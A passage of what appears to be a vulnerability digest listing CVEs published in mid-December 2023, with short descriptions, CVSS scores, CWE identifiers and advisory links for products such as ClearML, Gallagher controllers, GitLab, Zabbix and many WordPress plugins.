https://bugzilla.redhat.com/show_bug.cgi?id=2249523 | source : secalert@redhat.com

Vulnerability : CWE-122


Source : huntr.dev

Vulnerability ID : CVE-2023-6778

First published on : 18-12-2023 15:15:10
Last modified on : 18-12-2023 17:24:19

Description :
Cross-site Scripting (XSS) - Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (i.e. when a malicious party already has access to the internal network and to a user's ClearML login credentials).

CVE ID : CVE-2023-6778
Source : security@huntr.dev
CVSS Score : 7.5

References :
https://github.com/allegroai/clearml-server/commit/4684fd5b74af582c894b67a0a06e865c948b763a | source : security@huntr.dev
https://huntr.com/bounties/5f3fffac-0358-48e6-a500-81bac13e0e2b | source : security@huntr.dev

Vulnerability : CWE-79


Source : gallagher.com

Vulnerability ID : CVE-2023-24590

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
A format string issue in the Controller 6000's optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior.

CVE ID : CVE-2023-24590
Source : disclosures@gallagher.com
CVSS Score : 7.5

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-24590 | source : disclosures@gallagher.com

Vulnerability : CWE-134


Source : gitlab.com

Vulnerability ID : CVE-2023-6680

First published on : 15-12-2023 16:15:46
Last modified on : 15-12-2023 16:53:06

Description :
An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator.

CVE ID : CVE-2023-6680
Source : cve@gitlab.com
CVSS Score : 7.4

References :
https://gitlab.com/gitlab-org/gitlab/-/issues/421607 | source : cve@gitlab.com

Vulnerability : CWE-295


Source : vuldb.com

Vulnerability ID : CVE-2023-6848

First published on : 16-12-2023 07:15:44
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability.

CVE ID : CVE-2023-6848
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/kalcaddle/kodbox/commit/63a4d5708d210f119c24afd941d01a943e25334c | source : cna@vuldb.com
https://github.com/kalcaddle/kodbox/releases/tag/1.48.04 | source : cna@vuldb.com
https://note.zhaoj.in/share/pf838kAzQyTQ | source : cna@vuldb.com
https://vuldb.com/?ctiid.248209 | source : cna@vuldb.com
https://vuldb.com/?id.248209 | source : cna@vuldb.com

Vulnerability : CWE-77


Vulnerability ID : CVE-2023-6849

First published on : 16-12-2023 08:15:06
Last modified on : 18-12-2023 14:05:28

Description :
A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability.

CVE ID : CVE-2023-6849
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/kalcaddle/kodbox/commit/63a4d5708d210f119c24afd941d01a943e25334c | source : cna@vuldb.com
https://github.com/kalcaddle/kodbox/releases/tag/1.48.04 | source : cna@vuldb.com
https://note.zhaoj.in/share/jSsPAWT1pKsq | source : cna@vuldb.com
https://vuldb.com/?ctiid.248210 | source : cna@vuldb.com
https://vuldb.com/?id.248210 | source : cna@vuldb.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-6901

First published on : 17-12-2023 14:15:37
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259.

CVE ID : CVE-2023-6901
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/g1an123/POC/blob/main/README.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248259 | source : cna@vuldb.com
https://vuldb.com/?id.248259 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2023-6903

First published on : 17-12-2023 23:15:44
Last modified on : 18-12-2023 14:05:22

Description :
A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability.

CVE ID : CVE-2023-6903
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/willchen0011/cve/blob/main/NS-ASG-sql.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.248265 | source : cna@vuldb.com
https://vuldb.com/?id.248265 | source : cna@vuldb.com

Vulnerability : CWE-89


Source : patchstack.com

Vulnerability ID : CVE-2023-49159

First published on : 15-12-2023 16:15:43
Last modified on : 15-12-2023 16:53:06

Description :
Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv. This issue affects CommentLuv: from n/a through 3.0.4.

CVE ID : CVE-2023-49159
Source : audit@patchstack.com
CVSS Score : 7.2

References :
https://patchstack.com/database/vulnerability/commentluv/wordpress-commentluv-plugin-3-0-4-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-49170

First published on : 15-12-2023 15:15:07
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in captainform Forms by CaptainForm – Form Builder for WordPress allows Reflected XSS. This issue affects Forms by CaptainForm – Form Builder for WordPress: from n/a through 2.5.3.

CVE ID : CVE-2023-49170
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/captainform/wordpress-forms-by-captainform-form-builder-for-wordpress-plugin-2-5-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49176

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeRevolution WP Pocket URLs allows Reflected XSS. This issue affects WP Pocket URLs: from n/a through 1.0.2.

CVE ID : CVE-2023-49176
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/wp-pocket-urls/wordpress-wp-pocket-urls-plugin-1-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49177

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gilles Dumas which template file allows Reflected XSS. This issue affects which template file: from n/a through 4.9.0.

CVE ID : CVE-2023-49177
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/which-template-file/wordpress-which-template-file-plugin-4-9-0-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49178

First published on : 15-12-2023 15:15:08
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mr. Hdwplayer HDW Player Plugin (Video Player & Video Gallery) allows Reflected XSS. This issue affects HDW Player Plugin (Video Player & Video Gallery): from n/a through 5.0.

CVE ID : CVE-2023-49178
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/hdw-player-video-player-video-gallery/wordpress-hdw-player-plugin-video-player-video-gallery-plugin-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49182

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Fabio Marzocca List all posts by Authors, nested Categories and Titles allows Reflected XSS. This issue affects List all posts by Authors, nested Categories and Titles: from n/a through 2.7.10.

CVE ID : CVE-2023-49182
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/list-all-posts-by-authors-nested-categories-and-titles/wordpress-list-all-posts-by-authors-nested-categories-and-title-plugin-2-7-10-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49183

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NextScripts NextScripts: Social Networks Auto-Poster allows Reflected XSS. This issue affects NextScripts: Social Networks Auto-Poster: from n/a through 4.4.2.

CVE ID : CVE-2023-49183
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/social-networks-auto-poster-facebook-twitter-g/wordpress-nextscripts-social-networks-auto-poster-plugin-4-4-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49185

First published on : 15-12-2023 15:15:10
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7.

CVE ID : CVE-2023-49185
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/doofinder-for-woocommerce/wordpress-doofinder-wp-woocommerce-search-plugin-2-0-33-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49187

First published on : 15-12-2023 15:15:10
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spoonthemes Adifier - Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4.

CVE ID : CVE-2023-49187
Source : audit@patchstack.com
CVSS Score : 7.1

References :
https://patchstack.com/database/vulnerability/adifier/wordpress-adifier-classified-ads-wordpress-theme-theme-3-9-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Source : hpe.com

Vulnerability ID : CVE-2023-50271

First published on : 17-12-2023 15:15:07
Last modified on : 18-12-2023 14:05:22

Description :
A potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information.

CVE ID : CVE-2023-50271
Source : security-alert@hpe.com
CVSS Score : 7.2

References :
https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbux04551en_us | source : security-alert@hpe.com

Vulnerability : CWE-200


(308) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability ID : CVE-2023-33221

First published on : 15-12-2023 12:15:43
Last modified on : 15-12-2023 13:41:51

Description :
When reading DESFire keys, the function that reads the card isn't properly checking the boundaries when internally copying the data received. This allows a heap-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use the default DESFire key.

CVE ID : CVE-2023-33221
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 6.8

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-122


Vulnerability ID : CVE-2023-33222

First published on : 15-12-2023 12:15:44
Last modified on : 15-12-2023 13:41:51

Description :
When handling contactless cards, a specific function used to get additional information from the card doesn't check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device.

CVE ID : CVE-2023-33222
Source : a87f365f-9d39-4848-9b3a-58c7cae69cab
CVSS Score : 6.8

References :
https://www.idemia.com/wp-content/uploads/2023/11/Security-Advisory-SA-2023-05-2.pdf | source : a87f365f-9d39-4848-9b3a-58c7cae69cab

Vulnerability : CWE-121


Source : zabbix.com

Vulnerability ID : CVE-2023-32727

First published on : 18-12-2023 10:15:06
Last modified on : 18-12-2023 14:05:17

Description :
An attacker who has the privilege to configure Zabbix items can use the function icmpping() with an additional malicious command inside it to execute arbitrary code on the current Zabbix server.

CVE ID : CVE-2023-32727
Source : security@zabbix.com
CVSS Score : 6.8

References :
https://support.zabbix.com/browse/ZBX-23857 | source : security@zabbix.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-32728

First published on : 18-12-2023 10:15:07
Last modified on : 18-12-2023 14:05:17

Description :
The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command, resulting in a possible vulnerability for remote code execution.

CVE ID : CVE-2023-32728
Source : security@zabbix.com
CVSS Score : 4.6

References :
https://support.zabbix.com/browse/ZBX-23858 | source : security@zabbix.com

Vulnerability : CWE-20


Source : redhat.com

Vulnerability ID : CVE-2023-5056

First published on : 18-12-2023 14:15:10
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in the Skupper operator, which may permit a certain configuration to create a service account that would allow an authenticated attacker in the adjacent cluster to view deployments in all namespaces in the cluster. This issue permits unauthorized viewing of information outside of the user's purview.

CVE ID : CVE-2023-5056
Source : secalert@redhat.com
CVSS Score : 6.8

References :
https://access.redhat.com/errata/RHSA-2023:6219 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-5056 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2239517 | source : secalert@redhat.com

Vulnerability : CWE-862


Vulnerability ID : CVE-2023-3628

First published on : 18-12-2023 14:15:08
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in Infinispan's REST. Bulk read endpoints do not properly evaluate user permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.

CVE ID : CVE-2023-3628
Source : secalert@redhat.com
CVSS Score : 6.5

References :
https://access.redhat.com/errata/RHSA-2023:5396 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-3628 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2217924 | source : secalert@redhat.com

Vulnerability : CWE-304


Vulnerability ID : CVE-2023-5115

First published on : 18-12-2023 14:15:10
Last modified on : 18-12-2023 15:04:28

Description :
An absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path.

CVE ID : CVE-2023-5115
Source : secalert@redhat.com
CVSS Score : 6.3

References :
https://access.redhat.com/errata/RHSA-2023:5701 | source : secalert@redhat.com
https://access.redhat.com/errata/RHSA-2023:5758 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-5115 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2233810 | source : secalert@redhat.com


Vulnerability ID : CVE-2023-4320

First published on : 18-12-2023 14:15:09
Last modified on : 18-12-2023 15:04:28

Description :
An arithmetic overflow flaw was found in Satellite when creating a new personal access token. This flaw allows an attacker who uses this arithmetic overflow to create personal access tokens that are valid indefinitely, resulting in damage to the system's integrity.

CVE ID : CVE-2023-4320
Source : secalert@redhat.com
CVSS Score : 6.0

References :
https://access.redhat.com/security/cve/CVE-2023-4320 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2231814 | source : secalert@redhat.com

Vulnerability : CWE-613


Vulnerability ID : CVE-2023-6228

First published on : 18-12-2023 14:15:11
Last modified on : 18-12-2023 15:04:28

Description :
An issue was found in the tiffcp utility distributed by the libtiff package where processing a crafted TIFF file may cause a heap-based buffer overflow, leading to an application crash.

CVE ID : CVE-2023-6228
Source : secalert@redhat.com
CVSS Score : 5.5

References :
https://access.redhat.com/security/cve/CVE-2023-6228 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2240995 | source : secalert@redhat.com

Vulnerability : CWE-400


Vulnerability ID : CVE-2023-5236

First published on : 18-12-2023 14:15:10
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in Infinispan, which does not detect circular object references when unmarshalling. An authenticated attacker with sufficient permissions could insert a maliciously constructed object into the cache and use it to cause out of memory errors and achieve a denial of service.

CVE ID : CVE-2023-5236
Source : secalert@redhat.com
CVSS Score : 4.4

References :
https://access.redhat.com/errata/RHSA-2023:5396 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-5236 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2240999 | source : secalert@redhat.com

Vulnerability : CWE-1047


Vulnerability ID : CVE-2023-3629

First published on : 18-12-2023 14:15:08
Last modified on : 18-12-2023 15:04:28

Description :
A flaw was found in Infinispan's REST. Cache retrieval endpoints do not properly evaluate the necessary admin permissions for the operation. This issue could allow an authenticated user to access information outside of their intended permissions.

CVE ID : CVE-2023-3629
Source : secalert@redhat.com
CVSS Score : 4.3

References :
https://access.redhat.com/errata/RHSA-2023:5396 | source : secalert@redhat.com
https://access.redhat.com/security/cve/CVE-2023-3629 | source : secalert@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=2217926 | source : secalert@redhat.com

Vulnerability : CWE-304


Source : gallagher.com

Vulnerability ID : CVE-2023-6355

First published on : 18-12-2023 22:15:10
Last modified on : 18-12-2023 22:15:10

Description :
Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)).

CVE ID : CVE-2023-6355
Source : disclosures@gallagher.com
CVSS Score : 6.8

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-6355 | source : disclosures@gallagher.com

Vulnerability : CWE-1253


Vulnerability ID : CVE-2023-46686

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
A reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)).

CVE ID : CVE-2023-46686
Source : disclosures@gallagher.com
CVSS Score : 5.5

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-46686 | source : disclosures@gallagher.com

Vulnerability : CWE-807


Vulnerability ID : CVE-2023-23570

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
Client-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior.

CVE ID : CVE-2023-23570
Source : disclosures@gallagher.com
CVSS Score : 5.4

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-23570 | source : disclosures@gallagher.com

Vulnerability : CWE-602


Vulnerability ID : CVE-2023-23576

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
Incorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior.

CVE ID : CVE-2023-23576
Source : disclosures@gallagher.com
CVSS Score : 4.3

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-23576 | source : disclosures@gallagher.com

Vulnerability : CWE-696


Vulnerability ID : CVE-2023-23584

First published on : 18-12-2023 22:15:08
Last modified on : 18-12-2023 22:15:08

Description :
An observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all versions of 8.50 and prior.

CVE ID : CVE-2023-23584
Source : disclosures@gallagher.com
CVSS Score : 4.3

References :
https://security.gallagher.com/Security-Advisories/CVE-2023-23584 | source : disclosures@gallagher.com

Vulnerability : CWE-204


Source : huntr.dev

Vulnerability ID : CVE-2023-6889

First published on : 16-12-2023 09:15:07
Last modified on : 18-12-2023 14:05:28

Description :
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.

CVE ID : CVE-2023-6889
Source : security@huntr.dev
CVSS Score : 6.7

References :
https://github.com/thorsten/phpmyfaq/commit/1037a8f012e0d9ec4bf4c8107972f6695e381392 | source : security@huntr.dev
https://huntr.com/bounties/52897778-fad7-4169-bf04-a68a0646df0c | source : security@huntr.dev

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6890

First published on : 16-12-2023 09:15:07
Last modified on : 18-12-2023 14:05:28

Description :
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.17.

CVE ID : CVE-2023-6890
Source : security@huntr.dev
CVSS Score : 6.7

References :
https://github.com/thorsten/phpmyfaq/commit/97d90ebbe11ebc6081bf49a2ba4b60f227cd1b43 | source : security@huntr.dev
https://huntr.com/bounties/2cf11678-8793-4fa1-b21a-f135564a105d | source : security@huntr.dev

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-6832

First published on : 15-12-2023 01:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Business Logic Errors in GitHub repository microweber/microweber prior to 2.0.

CVE ID : CVE-2023-6832
Source : security@huntr.dev
CVSS Score : 6.0

References :
https://github.com/microweber/microweber/commit/890e9838aabbc799ebefcf6b20ba25e0fd6dbfee | source : security@huntr.dev
https://huntr.com/bounties/53105a20-f4b1-45ad-a734-0349de6d7376 | source : security@huntr.dev

Vulnerability : CWE-840


Source : cert.org.tw

Vulnerability ID : CVE-2023-48374

First published on : 15-12-2023 08:15:44
Last modified on : 15-12-2023 13:42:13

Description :
SmartStar Software CWS is a web-based integration platform; it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can't disrupt service or obtain sensitive information.

CVE ID : CVE-2023-48374
Source : twcert@cert.org.tw
CVSS Score : 6.5

References :
https://www.twcert.org.tw/tw/cp-132-7593-d3e5b-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-798


Vulnerability ID : CVE-2023-48381

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert is an email management platform; it has a Local File Inclusion (LFI) vulnerability in a special URL. An unauthenticated remote attacker can exploit this vulnerability to execute an arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information, but it does not affect service availability.

CVE ID : CVE-2023-48381
Source : twcert@cert.org.tw
CVSS Score : 6.5

References :
https://www.twcert.org.tw/tw/cp-132-7599-461d5-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48382

First published on : 15-12-2023 09:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert is an email management platform; it has a Local File Inclusion (LFI) vulnerability in a mail deliver-related URL. An unauthenticated remote attacker can exploit this vulnerability to execute an arbitrary PHP file with .asp file extension under specific system paths, to access and modify partial system information, but it does not affect service availability.

CVE ID : CVE-2023-48382
Source : twcert@cert.org.tw
CVSS Score : 6.5

References :
https://www.twcert.org.tw/tw/cp-132-7600-dd072-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-48395

First published on : 15-12-2023 10:15:08
Last modified on : 15-12-2023 13:42:13

Description :
Kaifa Technology WebITR is an online attendance system; it has insufficient validation for user input within a special function. A remote attacker with regular user privilege can exploit this vulnerability to inject arbitrary SQL commands to read the database.

CVE ID : CVE-2023-48395
Source : twcert@cert.org.tw
CVSS Score : 6.5

References :
https://www.twcert.org.tw/tw/cp-132-7625-a0b9c-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-89


Vulnerability ID : CVE-2023-48387

First published on : 15-12-2023 09:15:08
Last modified on : 15-12-2023 13:42:13

Description :
TAIWAN-CA(TWCA) JCICSecurityTool's Registry-related functions have insufficient filtering for special characters. An unauthenticated remote attacker can inject malicious script into a webpage to perform a Stored Cross-Site Scripting (XSS) attack.

CVE ID : CVE-2023-48387
Source : twcert@cert.org.tw
CVSS Score : 6.1

References :
https://www.twcert.org.tw/tw/cp-132-7602-a47a2-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-48379

First published on : 15-12-2023 08:15:45
Last modified on : 15-12-2023 13:42:13

Description :
Softnext Mail SQR Expert is an email management platform. It has inadequate filtering for a specific URL parameter within a specific function. An unauthenticated remote attacker can perform a Blind SSRF attack to discover internal network topology based on the URL error response.

CVE ID : CVE-2023-48379
Source : twcert@cert.org.tw
CVSS Score : 5.3

References :
https://www.twcert.org.tw/tw/cp-132-7597-fff54-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-48393

First published on : 15-12-2023 10:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Kaifa Technology WebITR is an online attendance system. A remote attacker with regular user privilege can obtain partial sensitive system information from an error message.

CVE ID : CVE-2023-48393
Source : twcert@cert.org.tw
CVSS Score : 4.3

References :
https://www.twcert.org.tw/tw/cp-132-7623-5660d-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-209


Source : patchstack.com

Vulnerability ID : CVE-2023-48765

First published on : 15-12-2023 14:15:14
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22.

CVE ID : CVE-2023-48765
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/email-address-encoder/wordpress-email-address-encoder-plugin-1-0-22-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49160

First published on : 15-12-2023 14:15:15
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6.

CVE ID : CVE-2023-49160
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/formzu-wp/wordpress-formzu-wp-plugin-1-6-6-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49169

First published on : 15-12-2023 15:15:07
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0.

CVE ID : CVE-2023-49169
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/ads-by-datafeedrcom/wordpress-ads-by-datafeedr-com-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49179

First published on : 15-12-2023 15:15:09
Last modified on : 15-12-2023 15:26:42

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6.

CVE ID : CVE-2023-49179
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/event-post/wordpress-event-post-plugin-5-8-6-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49823

First published on : 15-12-2023 16:15:45
Last modified on : 15-12-2023 16:53:06

Description :
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1.

CVE ID : CVE-2023-49823
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/bold-page-builder/wordpress-bold-page-builder-plugin-4-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-79


Vulnerability ID : CVE-2023-49855

First published on : 18-12-2023 11:15:13
Last modified on : 18-12-2023 14:05:17

Description :
